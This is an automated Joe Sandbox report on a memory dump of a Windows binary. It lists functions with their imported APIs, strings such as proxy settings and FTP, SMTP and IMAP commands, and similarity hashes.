Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: __swprintf_l
String ID: Data$Header$[%s %s %s]$from
API String ID: 1488884202-3178933089
Opcode ID: 08c216239d0a58eb61b941a698887df94798d01a762e5711a1fe6c3fc0179cc7
Instruction ID: 8a9f10a1b7ae8bc4305221351352c3d1a8bb54a2d5c7202672f503ffc881185a
Opcode Fuzzy Hash: 08c216239d0a58eb61b941a698887df94798d01a762e5711a1fe6c3fc0179cc7
Instruction Fuzzy Hash: 3D21E321B48A4651F7A0A724A4147F9E3D0AF4D7A4FC84236E97D062EADF3CD00ED294

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D28368 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 64COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D283EB
__swprintf_l.LIBCMT ref: 00007FF7F8D2844E

Strings

%7I64dd, xrefs: 00007FF7F8D28458
%3I64dd %02I64dh, xrefs: 00007FF7F8D2842F
%2I64d:%02I64d:%02I64d, xrefs: 00007FF7F8D283DA

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: __swprintf_l
String ID: %2I64d:%02I64d:%02I64d$%3I64dd %02I64dh$%7I64dd
API String ID: 1488884202-564197712
Opcode ID: 08f22a191100905f7822b2d624702b70d21314b2b1f5d28a843482150cf57912
Instruction ID: becb94652fa27006fa925a51e8cfc203693f0f45137ca1fd04a07c144e89e4a4
Opcode Fuzzy Hash: 08f22a191100905f7822b2d624702b70d21314b2b1f5d28a843482150cf57912
Instruction Fuzzy Hash: 4B11BED5F0568A47DE2893966C12BE4C289AF9CBC0FD49133EC5D0B3E5EE2C62069684

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D24E50 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

fseek.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D24F33

Strings

ioctl callback returned error %d, xrefs: 00007FF7F8D24F0E
necessary data rewind wasn't possible, xrefs: 00007FF7F8D24F3E
the ioctl callback returned %d, xrefs: 00007FF7F8D24EF6
seek callback returned error %d, xrefs: 00007FF7F8D24EB4

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: fseek
String ID: ioctl callback returned error %d$necessary data rewind wasn't possible$seek callback returned error %d$the ioctl callback returned %d
API String ID: 623662203-2561564945
Opcode ID: caf2019e7cfc3d599b45bd4bacc79bbd3d4373e26bbd5a53e8f285c64f87cac3
Instruction ID: 97a943117200bfceb2c220916879d9a55d20ee54af3ee871c1a49714e3cf00a1
Opcode Fuzzy Hash: caf2019e7cfc3d599b45bd4bacc79bbd3d4373e26bbd5a53e8f285c64f87cac3
Instruction Fuzzy Hash: ED21B935A0DA5241FB10AB35A540378E252AF8CFD4F9C1231DD3D4B6D8DF2DD048A7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D36488 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 54COMMON

Download Yara Rule

APIs

_cwprintf_s_l.LIBCMT ref: 00007FF7F8D36546

Strings

Couldn't use REST, xrefs: 00007FF7F8D36525
, xrefs: 00007FF7F8D3654F
RETR %s, xrefs: 00007FF7F8D3653F
ytes, xrefs: 00007FF7F8D364B5

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: _cwprintf_s_l
String ID: $Couldn't use REST$RETR %s$ytes
API String ID: 2941638530-1937135460
Opcode ID: 4a2f36407b92beda920e140c02283f0c9783fd13f50ef2abca38f136ab050421
Instruction ID: d8edafc091fd68ca87da62a5dfd65b22b21390c11e27540e99e6c43e10eb9fb0
Opcode Fuzzy Hash: 4a2f36407b92beda920e140c02283f0c9783fd13f50ef2abca38f136ab050421
Instruction Fuzzy Hash: 4721B651D1C68286FB50B724F440379E350AF4C754F845232E9BE4A6D6DF2CE049B7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D34540 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 34stringCOMMON

Download Yara Rule

APIs

isdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D34559
isdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D34567
isdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D34575
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F8D3458E

Strings

, xrefs: 00007FF7F8D3457F

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: isdigit$strtol
String ID:
API String ID: 2442889181-3916222277
Opcode ID: 6e8c5eee30e69089a101476ce72cae776836a0bf184691cfcd7e98b65ac4b67b
Instruction ID: e0ec5fdaa71301214b29020d0c622498e959b7509e9efa251476f9d1eceb0333
Opcode Fuzzy Hash: 6e8c5eee30e69089a101476ce72cae776836a0bf184691cfcd7e98b65ac4b67b
Instruction Fuzzy Hash: FCF081A1E0C19283E7646F23E844579F7A19F2CB40F8C8075D67A865D5CE2CD898B778

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D2EE30 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

_cwprintf_s_l.LIBCMT ref: 00007FF7F8D2EE73
_cwprintf_s_l.LIBCMT ref: 00007FF7F8D2EE9A

Strings

HELP, xrefs: 00007FF7F8D2EE85
%s %s, xrefs: 00007FF7F8D2EE65
VRFY, xrefs: 00007FF7F8D2EE5B

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: _cwprintf_s_l
String ID: %s %s$HELP$VRFY
API String ID: 2941638530-1654406642
Opcode ID: 8a9aae8bda12b01853152fd3dd486b3ca1ca738dec823351b8ba14d521321738
Instruction ID: 1e2c0237c1400614ddde98ced20c922dc9a6403b25fb92acae63be1e09381b86
Opcode Fuzzy Hash: 8a9aae8bda12b01853152fd3dd486b3ca1ca738dec823351b8ba14d521321738
Instruction Fuzzy Hash: DB011AA1E0868681FB90EB9594407B4E6909F09784F88507BCA3C162D2CF2D948CA3F8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D41A88 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 167COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F8D41EE0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D41F28
Part of subcall function 00007FF7F8D41EE0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D41F65
Part of subcall function 00007FF7F8D41EE0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D41F8E
Part of subcall function 00007FF7F8D41EE0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D41FA9

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,CONNECT,?,NTLM,00007FF7F8D3D463), ref: 00007FF7F8D41B2C

Strings

NTLM, xrefs: 00007FF7F8D41A9B, 00007FF7F8D41ADA, 00007FF7F8D41BC4
CONNECT, xrefs: 00007FF7F8D41A9E

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$malloc
String ID: CONNECT$NTLM
API String ID: 2190258309-480531918
Opcode ID: a96f6467ef4646aecb79114066ea8ede42d1f5e76666e7453fda30a29b6cc788
Instruction ID: f4fbd6caf81b9fa6a7c2e2a79a2bfdaf6401906c903399852c2d3826546619d6
Opcode Fuzzy Hash: a96f6467ef4646aecb79114066ea8ede42d1f5e76666e7453fda30a29b6cc788
Instruction Fuzzy Hash: 52813736609B4686EB20AF26F450369B3A8FB4CB84F884036DE5D43B94DF3CE558D758

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D10364 Relevance: 7.6, APIs: 5, Instructions: 89stringCOMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D103B1
isxdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D103E2
isxdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D103F4
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F8D10421
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D10460

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: isxdigit$freemallocstrtoul
String ID:
API String ID: 2287813817-0
Opcode ID: a03f5e892b60e0cb82254bc35a09ca2ef6c73511c09817b84b48d54ef6aecffd
Instruction ID: e2a042db0946fc59deff39f2ce689356afdcd0949d30989a0b13c1c07cb715be
Opcode Fuzzy Hash: a03f5e892b60e0cb82254bc35a09ca2ef6c73511c09817b84b48d54ef6aecffd
Instruction Fuzzy Hash: B331E421A0CA9585FB15AF72A48423EEB60AF09BA0F880131DABD077D4CE7CD849D764

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D23800 Relevance: 7.6, APIs: 5, Instructions: 82COMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,?,00007FF7F8D27070), ref: 00007FF7F8D23841
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000000,?,00007FF7F8D27070), ref: 00007FF7F8D23917

Part of subcall function 00007FF7F8D234B0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,00000000,?,00007FF7F8D27070), ref: 00007FF7F8D2351E
Part of subcall function 00007FF7F8D234B0: InitializeCriticalSectionEx.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,00000000,?,00007FF7F8D27070), ref: 00007FF7F8D23535

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D238A8
_beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D238E5
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D23903

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: _errno$CriticalInitializeSection_beginthreadexcallocfreemalloc
String ID:
API String ID: 3298959180-0
Opcode ID: cb2b70bca1e85bc600e526e80320c77bca3cb222113ca0fc87714bf81190e872
Instruction ID: 52822b77590c20a1fe77dc08b5c74e2d4ebd5e2eb29a036ee222f03be13ed6ed
Opcode Fuzzy Hash: cb2b70bca1e85bc600e526e80320c77bca3cb222113ca0fc87714bf81190e872
Instruction Fuzzy Hash: 30312126609B4582EB18AF12E804769F3A0FF5CB94F888175DE6D073D0DF3CE45997A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D0B96C Relevance: 7.6, APIs: 5, Instructions: 73stringCOMMON

Download Yara Rule

APIs

strchr.LIBVCRUNTIME ref: 00007FF7F8D0B9DD
strchr.LIBVCRUNTIME ref: 00007FF7F8D0B9F4
realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0BA1E
fgets.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D0BA59
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0BA70

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: strchr$fgetsfreerealloc
String ID:
API String ID: 3713276081-0
Opcode ID: de2c408f1ae50dd1dfe508a6d9571a95ff86dd4fa97b7608efdc7ba73076df94
Instruction ID: b0a5ea14eacecba45825c4709da2f2011a0d1863cbc2172922f1cf77652a12d9
Opcode Fuzzy Hash: de2c408f1ae50dd1dfe508a6d9571a95ff86dd4fa97b7608efdc7ba73076df94
Instruction Fuzzy Hash: 2A31B52260DA8141EB21EF15E4103E9E350FF9CB94F884231D9AD437C5DE3CD509D7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D0C63C Relevance: 7.6, APIs: 5, Instructions: 70stringCOMMON

Download Yara Rule

APIs

fgets.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00007FF7F8D0C26D), ref: 00007FF7F8D0C678
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D0C691
realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0C6CB
strchr.LIBVCRUNTIME ref: 00007FF7F8D0C6FE
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0C73A

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: _strdupfgetsfreereallocstrchr
String ID:
API String ID: 3499191936-0
Opcode ID: c29a703ec518f11a0bfd500d9abd81e7f0cd0c87dbd53574296d452f76667be6
Instruction ID: f49ae99656cc4dc43f7e75dee4b3ceb830b8a8c1f094e9a392e5794d0c8c960c
Opcode Fuzzy Hash: c29a703ec518f11a0bfd500d9abd81e7f0cd0c87dbd53574296d452f76667be6
Instruction Fuzzy Hash: 4621A221A0DA8540FB20AB21A4102A9E790EF9CBE0FD85330D9BD037D9DE2CD54A97A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D07638 Relevance: 7.6, APIs: 5, Instructions: 69fileCOMMON

Download Yara Rule

APIs

fputs.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D07690
isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D076B5
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D076D7
fputs.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D076E8
fputs.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D07700

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: fputs$fwriteisspace
String ID:
API String ID: 2170585975-0
Opcode ID: c906759dea234d2a78e1584ee8e268faab0413231503c2442c7e77a18f09ddd9
Instruction ID: b6cd585c8ab81d7055417dfb01275b069f69f0f81aa65fa818f2aa6b92c63c6b
Opcode Fuzzy Hash: c906759dea234d2a78e1584ee8e268faab0413231503c2442c7e77a18f09ddd9
Instruction Fuzzy Hash: 8C21C162B0995181EB61AB22EC147B9E360BF4CBC4FC90031DD7E4B6C8DE2CD54AD364

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D0BA80 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0BAD1
fread.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D0BAF1
realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0BB0E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0BB24
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0BB40

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: freerealloc$fread
String ID:
API String ID: 913911637-0
Opcode ID: 2c28d68f64c5e4da846730bb9e2bfaa4390ceb62d7d2a150778f36101ff5d3d0
Instruction ID: 7379052b2bfe4904c7c3024b91ccd21c48f304a5f29ce3cca1114af391a30c26
Opcode Fuzzy Hash: 2c28d68f64c5e4da846730bb9e2bfaa4390ceb62d7d2a150778f36101ff5d3d0
Instruction Fuzzy Hash: E721B321B0EB4142EB11AF52F804169E294EF58FD0F888630DE7E477C9EE7CE4499354

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D1E488 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

tolower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1E4BB

Strings

http_proxy, xrefs: 00007FF7F8D1E4FF
_proxy, xrefs: 00007FF7F8D1E4CF
ALL_PROXY, xrefs: 00007FF7F8D1E560
all_proxy, xrefs: 00007FF7F8D1E54F

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: tolower
String ID: ALL_PROXY$_proxy$all_proxy$http_proxy
API String ID: 3025214199-1845912879
Opcode ID: 8c3a29744a27511e73f7e1c5eb76e8cf2628a3e5b7c91e8f9198e6f87f733801
Instruction ID: 5cc7280a8bd62259220b8cd25c301d6424d571e2e45231186fa442aeca64aa3e
Opcode Fuzzy Hash: 8c3a29744a27511e73f7e1c5eb76e8cf2628a3e5b7c91e8f9198e6f87f733801
Instruction Fuzzy Hash: 3E21CA21A0DA9584FB15FB20E441379E390AF5C744FC40132DAAC476D6EF2CD54CEBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D3BB60 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D3BB98
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D3BBB9

Strings

Cannot SELECT without a mailbox., xrefs: 00007FF7F8D3BBCF
SELECT %s, xrefs: 00007FF7F8D3BBF9

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free
String ID: Cannot SELECT without a mailbox.$SELECT %s
API String ID: 1294909896-2454231232
Opcode ID: 185d97417fad781addb77d552844e189305ce1fffb953b2500ee801ae4347b81
Instruction ID: f4fa1932ecb3a23f86f9d9c09764649b0eef5ad514a1c3989d0c8561c6bec6de
Opcode Fuzzy Hash: 185d97417fad781addb77d552844e189305ce1fffb953b2500ee801ae4347b81
Instruction Fuzzy Hash: AA211225609A4682EB14FF26F450379E360FF48BC0F884031DAAE4B795CF2CE448A398

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D297A5 Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

strchr.LIBVCRUNTIME ref: 00007FF7F8D297A8
strchr.LIBVCRUNTIME ref: 00007FF7F8D297BB
strchr.LIBVCRUNTIME ref: 00007FF7F8D297CD
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D2980A

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: strchr$malloc
String ID:
API String ID: 2541711312-0
Opcode ID: 8aafb7106ee7b1f1bf542f18ed8eb94f6f7ef5cace4748e3f5d27dbf5c336f86
Instruction ID: 189d7300605727810968bed619705369b712bcf4201b9df0abfaaa1c69f73944
Opcode Fuzzy Hash: 8aafb7106ee7b1f1bf542f18ed8eb94f6f7ef5cace4748e3f5d27dbf5c336f86
Instruction Fuzzy Hash: 90017310A0E68351FB19BB226414179D290AF4DBC4B888470CD6E677D5EE3CE90A63A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D23E74 Relevance: 7.5, APIs: 6, Instructions: 44COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D242C9,?,?,?,00007FF7F8D19C81), ref: 00007FF7F8D23E95
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D242C9), ref: 00007FF7F8D23EB0
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D242C9), ref: 00007FF7F8D23ECB
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D23EE6
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D23F01
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D23F1C

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
